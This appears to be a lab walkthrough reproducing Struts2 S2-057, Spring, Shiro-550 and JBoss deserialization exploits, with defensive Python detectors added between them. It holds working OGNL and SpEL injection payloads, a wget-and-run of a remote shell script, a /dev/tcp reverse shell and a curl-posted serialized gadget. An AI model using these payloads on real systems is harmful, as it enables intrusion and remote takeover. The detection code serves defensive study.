S2-057 remote code execution vulnerability
Environment
Reproduction
Access the lab target
Enter http://123.57.211.129:8080/struts2-showcase/${(123+123)}/actionChain1.action in the URL bar and refresh; the expression in the middle of the path is evaluated and the two numbers are added together.
Capture the request and replace the verification payload above with the exploit:
/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
Executed successfully
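As an added, defender-side example that is not part of the original write-up: the check above relies on an OGNL expression being evaluated from the URL namespace, which is exactly the pattern a web-server log reviewer can hunt for. The Python script below decodes request targets (repeatedly, so double-encoding does not hide the braces), extracts `${...}` / `%{...}` expressions from the path and grades them by the OGNL constructs they contain (static class references, context variables, method calls, assignments). The log lines, IPs and timestamps are constructed for the example; the log format is the common Apache/Nginx combined format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the page's lab).
# Line 2 mimics a harmless probe, line 3 an expression that reaches into the OGNL context.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /struts2-showcase/$%7B%28123%2B123%29%7D/actionChain1.action HTTP/1.1" 302 0
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /struts2-showcase/$%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%7D/actionChain1.action HTTP/1.1" 302 0
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /report/%24100.pdf HTTP/1.1" 200 2048
"""

# Combined log format: client ip ... "METHOD target protocol" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# OGNL expression delimiters as Struts evaluates them: ${...} and %{...}
EXPR_RE = re.compile(r'[$%]\{(?P<body>.*?)\}', re.S)

# Constructs that show an expression is doing more than simple arithmetic.
# Each is only a weight; "assignment" also fires on comparisons such as a==b.
INDICATORS = {
    "static_ref": re.compile(r'@[\w.]+@'),     # @some.Class@ static member access
    "context_var": re.compile(r'#\w+'),        # #request, #dm, ... OGNL context variables
    "method_call": re.compile(r'\.\w+\s*\('),  # chained method invocation
    "assignment": re.compile(r'\w\s*='),       # #x=... assignments inside the expression
}


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads do not slip past the regexes."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_target(target: str) -> dict:
    """Return every bracketed expression in the request path and the indicators it triggers."""
    decoded = decode_target(target)
    path = decoded.split("?", 1)[0]  # the S2-057 vector sits in the path, not the query string
    findings = []
    for m in EXPR_RE.finditer(path):
        body = m.group("body")
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
        findings.append({"expression": body, "indicators": hits})
    return {"path": path, "expressions": findings}


def severity(report: dict) -> str:
    """none: no expression; medium: bare expression (probe); high: expression using OGNL constructs."""
    if not report["expressions"]:
        return "none"
    if any(e["indicators"] for e in report["expressions"]):
        return "high"
    return "medium"


def scan_log(text: str) -> list:
    """Parse each log line and collect alerts for requests carrying expressions in the path."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        report = classify_target(m.group("target"))
        sev = severity(report)
        if sev != "none":
            alerts.append({"ip": m.group("ip"), "severity": sev,
                           "path": report["path"], "expressions": report["expressions"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"].upper(), alert["ip"], alert["path"], alert["expressions"])
```

Even the "medium" probe is worth an alert: a `${(123+123)}` that comes back evaluated in a redirect location is the confirmation step this write-up uses, so seeing it in the logs usually precedes the real payload by seconds.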
Spring Data REST remote command execution (CVE-2017-8046)
Environment
Reproduction
1. Visit http://your-ip:8080/customers/1, then capture the request and change it to a PATCH request to modify the record
The data written is:
[{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" , "value": "vulhub" }]
Check the files in the Docker container; the file was written successfully
Done
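The vulnerability above comes down to the `path` member of a JSON Patch operation being handed to an expression evaluator instead of being treated as an RFC 6901 JSON Pointer. As an added, defender-side example (not the project's code and not part of the original write-up), the Python validator below accepts a patch document only if every `path` and `from` is a syntactically valid JSON Pointer and every `op` is one of the six RFC 6902 operations; the two sample documents are constructed, and the rejected one uses a `T(...)`-style path of the same shape as the one in the write-up.

```python
import json
import re

# RFC 6901 JSON Pointer: the empty string, or a sequence of "/" + reference-token,
# where a token may contain anything except "/" and "~" unless escaped as ~0 / ~1.
POINTER_RE = re.compile(r'^(?:/(?:[^/~]|~[01])*)*$')

# The six operations defined by RFC 6902
ALLOWED_OPS = {"add", "remove", "replace", "move", "copy", "test"}

# Constructed sample documents
GOOD_PATCH = '[{"op": "replace", "path": "/lastname", "value": "vulhub"}]'
BAD_PATCH = '[{"op": "replace", "path": "T(java.lang.String).valueOf(1)/lastname", "value": "x"}]'


def is_json_pointer(path) -> bool:
    """True only for strings that match the JSON Pointer grammar exactly."""
    return isinstance(path, str) and POINTER_RE.fullmatch(path) is not None


def validate_patch(document: str) -> list:
    """Return a list of (operation index, reason) problems; an empty list means the patch is acceptable."""
    try:
        ops = json.loads(document)
    except ValueError as exc:
        return [(-1, f"document is not valid JSON: {exc}")]
    if not isinstance(ops, list):
        return [(-1, "patch document must be a JSON array")]

    problems = []
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            problems.append((i, "operation must be an object"))
            continue
        if op.get("op") not in ALLOWED_OPS:
            problems.append((i, f"unknown op {op.get('op')!r}"))
        if "path" not in op:
            problems.append((i, "missing 'path'"))
        # Both "path" and (for move/copy) "from" must be pointers, never expressions
        for key in ("path", "from"):
            if key in op and not is_json_pointer(op[key]):
                shown = str(op[key])[:40]
                problems.append((i, f"{key!r} is not an RFC 6901 JSON Pointer: {shown!r}"))
    return problems


if __name__ == "__main__":
    for label, doc in (("good", GOOD_PATCH), ("bad", BAD_PATCH)):
        print(label, validate_patch(doc) or "OK")
```

The grammar check is the whole defence: a pointer can only ever select a member of the target document, so nothing that passes it can name a class, call a method or reach the runtime. Run the validator before the patch is applied, not after.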
Spring code execution (CVE-2018-1273)
Environment
Reproduction
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/crz")]=&password=&repeatedPassword=
docker exec -it 5fb01f48678a /bin/bash
Shiro rememberMe deserialization vulnerability (Shiro-550)
Environment
Reproduction
Verify that the target runs the Shiro framework
/usr/bin/wget -qO /tmp/shell.sh http://123.57.211.129/shell.sh
sh -i >& /dev/tcp/123.57.211.129/6666 0>&1
Execute the shell.sh file
/bin/bash /tmp/shell.sh
Reverse shell established
JBoss EJBInvokerServlet CVE-2013-4810 deserialization vulnerability
Environment
vulhub/jboss/JMXInvokerServlet-deserialization
Reproduction
# create the class file
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
# create the serialized file
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 123.57.211.129:6666
# listen on port 6666
nc -lvvp 6666
# POST it
curl http://123.57.211.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
Create the class file
Create the serialized file
Listen on port 6666
POST it
Done
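The final step above posts a raw Java serialized object to an invoker endpoint, which is a very distinctive thing to see on the wire. As an added, defender-side example (not part of the original write-up), the Python snippet below inspects a request the way a WAF rule or IDS signature would: it checks whether the body starts with the Java serialization header (raw `AC ED 00 05` or its base64 form `rO0AB`), whether the path is a JBoss invoker endpoint, and lists the class names it can pull out of `TC_CLASSDESC` records so an analyst sees at a glance which classes the stream tries to instantiate. The request body is constructed and truncated (a `java.util.HashMap` class descriptor is enough for the demonstration).

```python
import re

# Every Java ObjectOutputStream starts with STREAM_MAGIC 0xACED and STREAM_VERSION 5;
# the second constant is what those four bytes become once base64-encoded.
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
JAVA_STREAM_MAGIC_B64 = b"rO0AB"

# TC_CLASSDESC (0x72) is followed by a 2-byte big-endian length and the class name
CLASSDESC_RE = re.compile(rb"\x72(?P<len>[\x00-\xff]{2})(?P<name>[A-Za-z_$][\w.$]*)")

# JBoss invoker endpoints that read a serialized object from the request body
INVOKER_RE = re.compile(r"/invoker/|/(?:JMX|EJB)InvokerServlet", re.I)

# Constructed, truncated body: header, TC_OBJECT, TC_CLASSDESC, "java.util.HashMap", serialVersionUID,
# flags, field count and the first two field descriptors.
SAMPLE_BODY = (b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap"
               b"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02"
               b"F\x00\nloadFactorI\x00\tthreshold")


def looks_like_java_serialized(body: bytes) -> bool:
    """True if the body starts with the raw or base64-encoded Java serialization header."""
    return body.startswith(JAVA_STREAM_MAGIC) or body.lstrip().startswith(JAVA_STREAM_MAGIC_B64)


def serialized_class_names(body: bytes) -> list:
    """Best-effort extraction of class names from TC_CLASSDESC records in a raw stream."""
    names = []
    for m in CLASSDESC_RE.finditer(body):
        declared = int.from_bytes(m.group("len"), "big")
        name = m.group("name")
        # A stray 0x72 inside binary data is discarded unless its length field fits the text after it
        if 0 < declared <= len(name):
            names.append(name[:declared].decode("ascii"))
    return names


def inspect_request(method: str, path: str, body: bytes) -> dict:
    """Summarise why (or why not) a request should be flagged as a deserialization attempt."""
    serialized = looks_like_java_serialized(body)
    invoker = INVOKER_RE.search(path) is not None
    return {
        "invoker_endpoint": invoker,
        "serialized_body": serialized,
        "classes": serialized_class_names(body) if serialized else [],
        # Alert on any serialized object posted to an invoker endpoint, whatever it contains
        "alert": method.upper() == "POST" and invoker and serialized,
    }


if __name__ == "__main__":
    print(inspect_request("POST", "/invoker/readonly", SAMPLE_BODY))
    print(inspect_request("POST", "/invoker/readonly", b'{"hello": "world"}'))
```

Flagging on the header alone is deliberate: the invoker servlets exist to receive serialized objects, so the durable fix is to remove or authenticate them (the JBoss advisory's recommendation), and until then any such POST from an unexpected client is worth an alert regardless of which gadget classes the stream carries.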
HTTP.SYS remote code execution (MS15-034): MS --> Microsoft, 15 --> 2015, 034 --> bulletin number
Environment
Windows Server 2012, IIS 8.5